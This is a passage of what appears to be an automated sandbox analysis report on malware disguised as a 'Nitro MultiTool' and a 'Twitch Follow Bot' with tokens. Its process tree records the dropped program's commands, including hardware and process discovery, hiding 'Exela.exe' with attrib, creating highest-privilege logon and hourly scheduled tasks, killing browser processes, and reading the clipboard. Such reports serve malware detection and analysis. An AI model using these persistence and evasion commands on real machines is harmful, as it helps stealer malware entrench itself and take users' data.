Token: SeUndockPrivilege	8816	WMIC.exe
Token: SeManageVolumePrivilege	8816	WMIC.exe
Token: 33	8816	WMIC.exe
Token: 34	8816	WMIC.exe
Token: 35	8816	WMIC.exe
Token: 36	8816	WMIC.exe
Token: SeIncreaseQuotaPrivilege	8828	WMIC.exe
Token: SeSecurityPrivilege	8828	WMIC.exe
Token: SeTakeOwnershipPrivilege	8828	WMIC.exe
Token: SeLoadDriverPrivilege	8828	WMIC.exe
Token: SeSystemProfilePrivilege	8828	WMIC.exe
Token: SeSystemtimePrivilege	8828	WMIC.exe
Token: SeProfSingleProcessPrivilege	8828	WMIC.exe
Token: SeIncBasePriorityPrivilege	8828	WMIC.exe
Token: SeCreatePagefilePrivilege	8828	WMIC.exe
Token: SeBackupPrivilege	8828	WMIC.exe
Token: SeRestorePrivilege	8828	WMIC.exe
Token: SeShutdownPrivilege	8828	WMIC.exe
Token: SeDebugPrivilege	8828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	8828	WMIC.exe
Token: SeRemoteShutdownPrivilege	8828	WMIC.exe
Token: SeUndockPrivilege	8828	WMIC.exe
Token: SeManageVolumePrivilege	8828	WMIC.exe
Token: 33	8828	WMIC.exe
Token: 34	8828	WMIC.exe
Token: 35	8828	WMIC.exe
Token: 36	8828	WMIC.exe
Token: SeIncreaseQuotaPrivilege	8828	WMIC.exe
Token: SeSecurityPrivilege	8828	WMIC.exe
Token: SeTakeOwnershipPrivilege	8828	WMIC.exe
Token: SeLoadDriverPrivilege	8828	WMIC.exe
Token: SeSystemProfilePrivilege	8828	WMIC.exe
Token: SeSystemtimePrivilege	8828	WMIC.exe
Token: SeProfSingleProcessPrivilege	8828	WMIC.exe
Token: SeIncBasePriorityPrivilege	8828	WMIC.exe
Token: SeCreatePagefilePrivilege	8828	WMIC.exe
Token: SeBackupPrivilege	8828	WMIC.exe
Token: SeRestorePrivilege	8828	WMIC.exe
Token: SeShutdownPrivilege	8828	WMIC.exe
Token: SeDebugPrivilege	8828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	8828	WMIC.exe
Token: SeRemoteShutdownPrivilege	8828	WMIC.exe
Token: SeUndockPrivilege	8828	WMIC.exe
Token: SeManageVolumePrivilege	8828	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
5128	7zG.exe
5124	notepad.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe

Suspicious use of SendNotifyMessage 40 IoCs

pid	Process
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
1608	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
8728	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe
7856	msedge.exe

Suspicious use of SetWindowsHookEx 34 IoCs

pid	Process
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
3908	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe
4964	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1608 wrote to memory of 2456	1608	msedge.exe	85
PID 1608 wrote to memory of 2456	1608	msedge.exe	85
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 1448	1608	msedge.exe	86
PID 1608 wrote to memory of 3528	1608	msedge.exe	87
PID 1608 wrote to memory of 3528	1608	msedge.exe	87
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88
PID 1608 wrote to memory of 2396	1608	msedge.exe	88

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
6100	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/folder/NNhizKIY#_598We3JUoSu2eXAdjgzhg
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1608
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x108,0x10c,0x110,0xd8,0x114,0x7ffebdd546f8,0x7ffebdd54708,0x7ffebdd54718
  2⤵
  PID:2456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2256 /prefetch:2
  2⤵
  PID:1448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2824 /prefetch:8
  2⤵
  PID:2396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
  2⤵
  PID:4432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
  2⤵
  PID:872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4880 /prefetch:8
  2⤵
  PID:3076
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5760 /prefetch:8
  2⤵
  PID:3948
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5760 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4568
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5332 /prefetch:8
  2⤵
  PID:4472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
  2⤵
  PID:4996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6052 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2940
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
  2⤵
  PID:2168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
  2⤵
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:1
  2⤵
  PID:5192
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
  2⤵
  PID:5276
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6284 /prefetch:1
  2⤵
  PID:5284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5792 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,2180422514954722679,11514202535583702049,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4924 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1924

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2940

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3304

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x240 0x338
1⤵
PID:948

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5596

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap1868:248:7zEvent24857
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5128

C:\Users\Admin\Desktop\Nitro MultiTool By fknMega 1.6.0\Nitro MultiTool.exe
"C:\Users\Admin\Desktop\Nitro MultiTool By fknMega 1.6.0\Nitro MultiTool.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5516
- C:\ProgramData\vshost\vshost.exe
  C:\ProgramData\\vshost\\vshost.exe ,.
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1072
- C:\Users\Admin\Desktop\Nitro MultiTool By fknMega 1.6.0\nssdbm3.cfg
  nssdbm3.cfg
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3852
- - C:\Windows\System32\notepad.exe
    "C:\Windows\System32\notepad.exe" ./results/codes.txt
    3⤵
    - Suspicious use of FindShellTrayWindow
    PID:5124
- C:\ProgramData\winst\winst.exe
  C:\ProgramData\\winst\\winst.exe VhO6owOdmkXAxiL1lLqHaENatpAbxgSrfDENHYnuHa97gw8Fj7Xx60Qo2kpDavZ3
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:3156

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3908
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Twitch Follow Bot Tool + 10K Tokens\ldap60.bin
  2⤵
  PID:1592

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4964
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Twitch Follow Bot Tool + 10K Tokens\libcef.lib
  2⤵
  PID:2128

C:\Users\Admin\Desktop\Twitch Follow Bot Tool + 10K Tokens\BlackFollow.exe
"C:\Users\Admin\Desktop\Twitch Follow Bot Tool + 10K Tokens\BlackFollow.exe"
1⤵
- Executes dropped EXE
PID:3712
- C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
  "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
  2⤵
  - Executes dropped EXE
  PID:1492
- - C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe
    "C:\Users\Admin\AppData\Local\Temp\Windows Explorer.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5836
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "ver"
      4⤵
      PID:8468
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:8608
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        Suspicious use of AdjustPrivilegeToken
        
        PID:8828
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
      4⤵
      PID:8620
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:8816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "gdb --version"
      4⤵
      PID:8628
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:8636
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:8768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
      4⤵
      PID:8980
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        5⤵
        
        PID:9032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:9068
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:9152
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:9076
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:9176
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
      4⤵
      Hide Artifacts: Hidden Files and Directories
      PID:5008
    - - C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
        5⤵
        Views/modifies file attributes
        
        PID:6100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "schtasks /query /TN "ExelaUpdateService""
      4⤵
      PID:2968
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /query /TN "ExelaUpdateService"
        5⤵
        
        PID:5272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc onlogon /rl highest /tn "ExelaUpdateService" /tr "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
      4⤵
      PID:5868
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "ExelaUpdateService" /tr "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6164
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "schtasks /create /f /sc hourly /mo 1 /rl highest /tn "ExelaUpdateService2" /tr "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe""
      4⤵
      PID:6184
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc hourly /mo 1 /rl highest /tn "ExelaUpdateService2" /tr "C:\Users\Admin\AppData\Local\ExelaUpdateService\Exela.exe"
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6236
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist"
      4⤵
      PID:6252
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        
        PID:6304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1608"
      4⤵
      PID:6336
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1608
        5⤵
        Kills process with taskkill
        
        PID:6388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2456"
      4⤵
      PID:6424
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2456
        5⤵
        Kills process with taskkill
        
        PID:6488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1448"
      4⤵
      PID:6520
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1448
        5⤵
        Kills process with taskkill
        
        PID:6564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3528"
      4⤵
      PID:6600
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3528
        5⤵
        Kills process with taskkill
        
        PID:6652
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2396"
      4⤵
      PID:6684
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2396
        5⤵
        Kills process with taskkill
        
        PID:6732
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 872"
      4⤵
      PID:6764
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 872
        5⤵
        Kills process with taskkill
        
        PID:6816
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3076"
      4⤵
      PID:1780
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3076
        5⤵
        Kills process with taskkill
        
        PID:6844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5276"
      4⤵
      PID:6872
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5276
        5⤵
        Kills process with taskkill
        
        PID:6924
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5284"
      4⤵
      PID:6956
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5284
        5⤵
        Kills process with taskkill
        
        PID:7008
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
      4⤵
      PID:2068
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        5⤵
        
        PID:7364
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:7396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
      4⤵
      PID:1088
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c chcp
        5⤵
        
        PID:7320
      - C:\Windows\system32\chcp.com
        
        chcp
        6⤵
        
        PID:7352
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5960
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:7296
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
      4⤵
